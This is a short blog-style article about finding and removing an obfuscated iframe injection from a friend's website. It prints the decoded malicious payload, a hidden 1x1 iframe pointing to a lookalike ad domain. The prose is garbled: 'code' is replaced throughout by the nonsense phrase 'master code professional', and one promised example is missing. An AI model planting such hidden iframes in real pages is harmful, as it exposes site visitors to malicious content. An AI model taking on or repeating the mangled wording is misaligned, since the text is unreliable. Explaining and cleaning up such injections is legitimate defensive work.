<p>I have written several popular articles on iframe injections which you can read by visiting:<br /><br /><a rel="nofollow" onClick="javascript:pageTracker._trackPageview(\’/outgoing/article_exit_link\’);" href="http://websiteprotection.blogspot.com/">http://websiteprotection.blogspot.com</a><br /><br />The people who implemented my suggestions, reported they had quite a bit of success in avoiding these malicious iframe injection attacks.  Their websites were now safe and their traffic was continuous.<br /><br />I had a friend who was a victim of these iframe injection attacks.  When I tested his site, all tests indicated that his site was clean, but yet I knew this could not be the case.  I checked all his index.* files and could not find any obvious hidden iframes.  What I did notice was some master code professionals that were obuscated that my friend had no explanation for.<br /><br />Obfuscation is the concealment of meaning in communication, making communication confusing, intentionally ambiguous, and more difficult to interpret. It is basically a form of encryption.   The web page is not really encrypted, or else the web page would not display when accessed.  The web browser can tell the difference between this encrypted master code professional and regular HTML, but the human eye cannot decipher the encrypted master code professional.<br /><br />Upon further investigation, I found that compromised websites can be infected with hidden iframes and/or with obfuscated (escaped) javascript master code professional. My friend\’s website appeared to be a victim of this obfuscated iframe injection.<br /><br />The following was the suspected malicious iframe injection obfuscated master code professional:<br /><br />[Script Language=\'Javascript\']<br /><br />[!--<br /><br />[removed](unescape(\’\'));<br />//–&gt;<br />[/Script]<br /><br />Researching the issue further I found a website that was able to deobfuscate, or decrypt, the master code professional at:<br /><br /><a rel="nofollow" onClick="javascript:pageTracker._trackPageview(\’/outgoing/article_exit_link\’);" href="http://www.novirusthanks.org/javascript-deobfuscator.html">http://www.novirusthanks.org/javascript-deobfuscator.html</a><br /><br />What you do is copy only the obsfuscated master code professional as shown below:<br /><br /><br /><br />You then paste the master code professional into the form box they provide and then click on "Deobfuscate".<br /><br />The following was the resulting malicious iframe injection master code professional:<br /><br />[iframe src= http: //goooogleadsence.biz/_click=8F9DA  width=1 height=1 style= visibility:hidden;position:absolute ][/iframe]<br /><br />By completely removing the obfuscated (escaped) javascript master code professional, my friend\’s website was clean and safe again.<br /><br />If you implement my suggestions, particulariy the CHMOD 444, after an iframe injection attack, and are fairly sure your website is clean, then chances are you may not be a victim of iframe injection obfuscated (escaped) javascript master code professional.  One must not forget though, that no website will ever be 100% secure which is why we must always practise preventative measures.<br /><br />It is also important to remember that not all iframes are bad.  Before you remove a suspected iframe, make sure it is not relevant to your web page.  You might want to download a copy of the web page before you do any deleting just to be sure if your are not certain.</p>